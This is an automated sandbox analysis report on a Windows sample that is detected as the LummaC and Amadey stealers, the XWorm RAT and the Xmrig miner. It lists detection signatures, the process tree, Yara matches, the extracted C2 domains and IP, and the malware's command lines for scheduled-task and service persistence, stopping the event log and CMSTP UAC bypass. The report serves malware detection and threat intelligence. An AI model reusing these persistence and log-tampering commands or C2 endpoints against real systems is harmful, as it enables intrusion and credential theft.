Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1585651
MD5:38560b590890a37ab8460092560d282c
SHA1:2564dac98b8ed26fccaed9764f172c9123e50f2b
SHA256:014857e05f8c8abace4ccf74a6e613a755a651d724c510dc5959bea75295f53b
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, XWorm, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Powershell launch regsvr32
Sigma detected: Stop EventLog
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
Yara detected XWorm
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the startup folder
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found pyInstaller with non standard icon
Found strings related to Crypto-Mining
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: Suspect Svchost Activity
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7756 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 38560B590890A37AB8460092560D282C)
    • skotes.exe (PID: 7920 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 38560B590890A37AB8460092560D282C)
  • skotes.exe (PID: 7432 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 38560B590890A37AB8460092560D282C)
    • 9LbUK15.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe" MD5: 86268AF17C4C5AFF970734EB5775A7F8)
      • cmstp.exe (PID: 7856 cmdline: "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)
      • Ele.exe (PID: 8032 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe" MD5: 75C2C9D60104BA3C4271B2A629E90023)
    • e44fda3216.exe (PID: 1608 cmdline: "C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe" MD5: 89CF32E94C9A6312D70F99607678E53F)
    • zjFtdxQ.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" MD5: 68D36FA633B4FB19D5C5B285C9A0B415)
      • zjFtdxQ.tmp (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp" /SL5="$30528,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" MD5: BCC236A3921E1388596A42B05686FF5E)
        • zjFtdxQ.exe (PID: 2044 cmdline: "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT MD5: 68D36FA633B4FB19D5C5B285C9A0B415)
          • zjFtdxQ.tmp (PID: 2000 cmdline: "C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT MD5: BCC236A3921E1388596A42B05686FF5E)
            • regsvr32.exe (PID: 4088 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 6072 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 4904 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NzL6O1Q.exe (PID: 2112 cmdline: "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe" MD5: D22612D2899FC888514C3CA553B49F79)
      • schtasks.exe (PID: 1668 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • db3cab6cee.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe" MD5: 9D60674507EA97985C7E3B08D610F8D7)
  • svchost.exe (PID: 1196 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Ele.exe (PID: 3408 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe" MD5: 75C2C9D60104BA3C4271B2A629E90023)
  • pcqxl.exe (PID: 5292 cmdline: C:\Users\user\AppData\Local\Temp\pcqxl.exe MD5: 382DC2CC6405B237FA73B03EF0B52327)
    • powercfg.exe (PID: 4484 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2164 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8140 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1804 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5632 cmdline: C:\Windows\system32\sc.exe delete "RNRFMTFS" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3740 cmdline: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4348 cmdline: C:\Windows\system32\sc.exe start "RNRFMTFS" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • NzL6O1Q.exe (PID: 8160 cmdline: C:\Users\user\AppData\Roaming\NzL6O1Q.exe MD5: D22612D2899FC888514C3CA553B49F79)
  • yklcfqtilcgt.exe (PID: 6172 cmdline: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe MD5: 382DC2CC6405B237FA73B03EF0B52327)
    • powercfg.exe (PID: 2140 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2716 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4564 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6176 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 6596 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • NzL6O1Q.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Roaming\NzL6O1Q.exe" MD5: D22612D2899FC888514C3CA553B49F79)
  • NzL6O1Q.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Roaming\NzL6O1Q.exe" MD5: D22612D2899FC888514C3CA553B49F79)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["crowdwarek.shop", "apporholis.shop", "letterdrive.shop", "handscreamny.shop", "chipdonkeruz.shop", "soundtappysk.shop", "robinsharez.shop", "femalsabler.shop", "versersleep.shop"], "Build id": "LOGS11--6969"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exerat_win_xworm_v2Finds XWorm v2 samples based on characteristic stringsSekoia.io
    • 0x7652:$str02: ngrok
    • 0x1979b:$str02: ngrok
    • 0x197f5:$str02: ngrok
    • 0x73b1:$str03: Mutexx
    • 0x1991d:$str04: FileManagerSplitFileManagerSplit
    • 0x197c1:$str05: InstallngC
    • 0x19385:$str06: downloadedfile
    • 0x1927d:$str11: txtttt
    • 0x1a179:$str12: \root\SecurityCenter2
    • 0x199a3:$str13: [USB]
    • 0x19989:$str14: [Drive]
    • 0x1990b:$str15: [Folder]
    • 0x1a1a5:$str19: Select * from AntivirusProduct
    • 0x18e91:$str21: RunBotKiller
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exerat_win_xworm_v2Finds XWorm v2 samples based on characteristic stringsSekoia.io
      • 0x7652:$str02: ngrok
      • 0x1979b:$str02: ngrok
      • 0x197f5:$str02: ngrok
      • 0x73b1:$str03: Mutexx
      • 0x1991d:$str04: FileManagerSplitFileManagerSplit
      • 0x197c1:$str05: InstallngC
      • 0x19385:$str06: downloadedfile
      • 0x1927d:$str11: txtttt
      • 0x1a179:$str12: \root\SecurityCenter2
      • 0x199a3:$str13: [USB]
      • 0x19989:$str14: [Drive]
      • 0x1990b:$str15: [Folder]
      • 0x1a1a5:$str19: Select * from AntivirusProduct
      • 0x18e91:$str21: RunBotKiller
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exeJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 3 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000015.00000002.2849008746.0000000000DE0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 17 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  21.2.Ele.exe.1315ae50.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    20.0.NzL6O1Q.exe.720000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      20.0.NzL6O1Q.exe.720000.0.unpackrat_win_xworm_v2Finds XWorm v2 samples based on characteristic stringsSekoia.io
                      • 0x7652:$str02: ngrok
                      • 0x1979b:$str02: ngrok
                      • 0x197f5:$str02: ngrok
                      • 0x73b1:$str03: Mutexx
                      • 0x1991d:$str04: FileManagerSplitFileManagerSplit
                      • 0x197c1:$str05: InstallngC
                      • 0x19385:$str06: downloadedfile
                      • 0x1927d:$str11: txtttt
                      • 0x1a179:$str12: \root\SecurityCenter2
                      • 0x199a3:$str13: [USB]
                      • 0x19989:$str14: [Drive]
                      • 0x1990b:$str15: [Folder]
                      • 0x1a1a5:$str19: Select * from AntivirusProduct
                      • 0x18e91:$str21: RunBotKiller
                      21.2.Ele.exe.de0000.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        5.2.skotes.exe.400000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 6 entries

                          Sigma Signatures

                          Change of critical system settings

                          barindex
                          Sigma detected: Disable power options
                          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentImage: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentProcessId: 5292, ParentProcessName: pcqxl.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 4484, ProcessName: powercfg.exe

                          System Summary

                          barindex
                          Sigma detected: Potentially Suspicious Child Process Of Regsvr32
                          Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6072, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4904, ProcessName: powershell.exe
                          Sigma detected: Suspect Svchost Activity
                          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentImage: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentProcessId: 6172, ParentProcessName: yklcfqtilcgt.exe, ProcessCommandLine: svchost.exe, ProcessId: 6596, ProcessName: svchost.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\NzL6O1Q.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, ProcessId: 2112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NzL6O1Q
                          Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe, ProcessId: 7776, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpf0uuzm.ug5.ps1
                          Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp, ParentProcessId: 2000, ParentProcessName: zjFtdxQ.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ProcessId: 4088, ProcessName: regsvr32.exe
                          Sigma detected: Startup Folder File Write
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe, ProcessId: 7776, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                          Sigma detected: Suspicious Add Scheduled Task Parent
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, ParentProcessId: 2112, ParentProcessName: NzL6O1Q.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", ProcessId: 1668, ProcessName: schtasks.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, ParentProcessId: 2112, ParentProcessName: NzL6O1Q.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", ProcessId: 1668, ProcessName: schtasks.exe
                          Sigma detected: Uncommon Svchost Parent Process
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentImage: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentProcessId: 6172, ParentProcessName: yklcfqtilcgt.exe, ProcessCommandLine: svchost.exe, ProcessId: 6596, ProcessName: svchost.exe
                          Sigma detected: New Service Creation Using Sc.EXE
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentImage: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentProcessId: 5292, ParentProcessName: pcqxl.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto", ProcessId: 3740, ProcessName: sc.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
